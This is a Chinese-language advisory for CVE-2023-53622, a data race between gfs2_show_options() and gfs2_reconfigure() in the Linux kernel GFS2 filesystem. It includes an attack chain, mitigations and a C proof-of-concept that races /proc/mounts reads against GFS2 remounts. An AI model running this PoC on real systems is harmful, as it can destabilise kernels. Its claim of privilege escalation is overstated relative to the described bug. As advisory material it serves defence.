CVE-2023-53622 Linux内核GFS2文件系统数据竞争漏洞

漏洞信息

漏洞编号

CVE-2023-53622

漏洞类型

数据竞争（Race Condition）

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（GFS2文件系统模块）

漏洞概述

CVE-2023-53622是Linux内核GFS2（Global File System 2）文件系统中存在的一个数据竞争漏洞。该漏洞位于gfs2_show_options()函数中，当访问struct gfs2_tune结构体中的某些字段（如gt_logd_secs）时，未能正确持有gt_spin自旋锁进行保护。具体而言，在显示挂载选项时，函数直接读取sd_tune.gt_logd_secs等字段的值，而与此同时，其他函数（如gfs2_reconfigure()）可能会并发地修改这些字段的值。这种缺少同步保护的并发访问会导致数据竞争问题，可能引发未定义行为、内核崩溃或内存损坏等严重后果。

该漏洞的CVSS 3.1评分为7.0，属于高危级别。攻击向量为本地攻击（AV:L），攻击复杂度较高（AC:H），需要低权限（PR:L），无需用户交互（UI:N）。一旦利用成功，对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。该漏洞影响了多个Linux内核稳定版本，已通过多个补丁提交进行修复，涉及内核版本包括5.10.x、5.15.x、6.1.x和6.6.x等主流长期支持版本。

数据竞争漏洞在多核系统中尤为危险，因为现代服务器和工作站普遍采用多核架构，使得并发执行成为常态。该漏洞的修复方案是在访问gfs2_tune结构体字段前后正确获取和释放gt_spin自旋锁，确保对共享数据的互斥访问。

技术细节

该漏洞的根本原因在于gfs2_show_options()函数中对struct gfs2_tune结构体字段的访问缺乏适当的锁保护。struct gfs2_tune结构体包含GFS2文件系统的各种可调参数，其中gt_logd_secs字段用于控制日志守护进程的提交间隔。

在漏洞代码中，gfs2_show_options()函数执行如下操作：
1. 直接读取sdp->sd_tune.gt_logd_secs的值到局部变量val
2. 根据val的值决定是否通过seq_printf输出commit参数

与此同时，gfs2_reconfigure()函数可能会并发执行以下操作：
1. 获取gt->gt_spin自旋锁
2. 修改gt->gt_logd_secs为新值newargs->ar_commit
3. 释放自旋锁

由于gfs2_show_options()在读取gt_logd_secs时未持有gt_spin锁，两个函数对同一内存位置的并发访问构成了典型的数据竞争场景。在多处理器系统中，这种竞争可能导致以下后果：
1. 读取到不一致或撕裂的值
2. 编译器优化导致的意外行为
3. 内核内存损坏
4. 系统崩溃或不稳定

修复方案是在gfs2_show_options()中访问gfs2_tune字段前获取gt_spin锁，访问完成后释放锁。此外，Andreas进一步建议不要在持有自旋锁的情况下执行seq_printf操作，以避免长时间持有锁带来的性能问题。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在目标系统上拥有本地用户权限，且系统需要挂载有GFS2文件系统。GFS2是Red Hat Global File System 2，常用于集群环境。

STEP 2

步骤2：触发并发访问

攻击者通过多个线程同时执行读取操作（如读取/proc/mounts或/proc/self/mountinfo），这些操作会调用gfs2_show_options()函数读取gt_logd_secs等字段。

STEP 3

步骤3：并发修改

同时，攻击者通过remount系统调用修改GFS2挂载参数（如commit值），触发gfs2_reconfigure()函数在持有gt_spin锁的情况下修改gt_logd_secs字段。

STEP 4

步骤4：触发数据竞争

由于gfs2_show_options()未持有gt_spin锁就读取gt_logd_secs，与gfs2_reconfigure()的写入操作形成数据竞争，可能导致读取到不一致的值或内存损坏。

STEP 5

步骤5：影响利用

数据竞争可能导致内核不稳定、内存损坏，甚至在特定条件下被利用进行权限提升或拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53622 PoC - Trigger data race in gfs2_show_options()
// This PoC demonstrates how to trigger the race condition by concurrently
// accessing gfs2_show_options() while modifying gfs2_tune fields.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <fcntl.h>
#include <sys/mount.h>
#include <sys/stat.h>

#define GFS2_MOUNT_POINT "/mnt/gfs2_test"
#define NUM_THREADS 10
#define ITERATIONS 1000

// Thread function to trigger gfs2_show_options() via /proc/mounts or mountinfo
void* reader_thread(void* arg) {
    char buf[4096];
    int fd;
    
    for (int i = 0; i < ITERATIONS; i++) {
        // Reading /proc/mounts triggers show_options for GFS2 filesystems
        fd = open("/proc/mounts", O_RDONLY);
        if (fd >= 0) {
            while (read(fd, buf, sizeof(buf)) > 0);
            close(fd);
        }
        
        // Also try mountinfo which also calls show_options
        fd = open("/proc/self/mountinfo", O_RDONLY);
        if (fd >= 0) {
            while (read(fd, buf, sizeof(buf)) > 0);
            close(fd);
        }
        usleep(1);
    }
    return NULL;
}

// Thread function to modify gfs2_tune via remount
void* writer_thread(void* arg) {
    for (int i = 0; i < ITERATIONS; i++) {
        // Remount with different commit value to trigger gfs2_reconfigure()
        // This modifies gt_logd_secs which races with gfs2_show_options()
        mount("none", GFS2_MOUNT_POINT, "gfs2", MS_REMOUNT | MS_NOSUID, "commit=1");
        usleep(1);
        mount("none", GFS2_MOUNT_POINT, "gfs2", MS_REMOUNT | MS_NOSUID, "commit=60");
        usleep(1);
    }
    return NULL;
}

int main(int argc, char* argv[]) {
    pthread_t readers[NUM_THREADS];
    pthread_t writers[2];
    
    printf("CVE-2023-53622 PoC - GFS2 Data Race\n");
    printf("Attempting to trigger race condition between\n");
    printf("gfs2_show_options() and gfs2_reconfigure()\n\n");
    
    // Check if GFS2 is mounted
    struct stat st;
    if (stat(GFS2_MOUNT_POINT, &st) != 0) {
        printf("Error: GFS2 not mounted at %s\n", GFS2_MOUNT_POINT);
        printf("Please mount a GFS2 filesystem first.\n");
        return 1;
    }
    
    printf("Starting %d reader threads and 2 writer threads...\n", NUM_THREADS);
    
    // Create reader threads (trigger show_options)
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_create(&readers[i], NULL, reader_thread, NULL);
    }
    
    // Create writer threads (trigger reconfigure)
    for (int i = 0; i < 2; i++) {
        pthread_create(&writers[i], NULL, writer_thread, NULL);
    }
    
    // Wait for all threads
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(readers[i], NULL);
    }
    for (int i = 0; i < 2; i++) {
        pthread_join(writers[i], NULL);
    }
    
    printf("Done. Check kernel logs for any race condition warnings.\n");
    printf("Use 'dmesg | grep -i race' to check for BUG reports.\n");
    
    return 0;
}

影响范围

Linux Kernel < 5.10.229

Linux Kernel 5.15.x < 5.15.165

Linux Kernel 6.1.x < 6.1.119

Linux Kernel 6.6.x < 6.6.63

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制本地用户对GFS2挂载点的访问权限；2）避免在多核系统中频繁进行GFS2文件系统的remount操作；3）监控系统日志，及时发现异常行为；4）考虑暂时使用其他文件系统替代GFS2；5）通过cgroups限制非特权用户对GFS2相关系统调用的访问。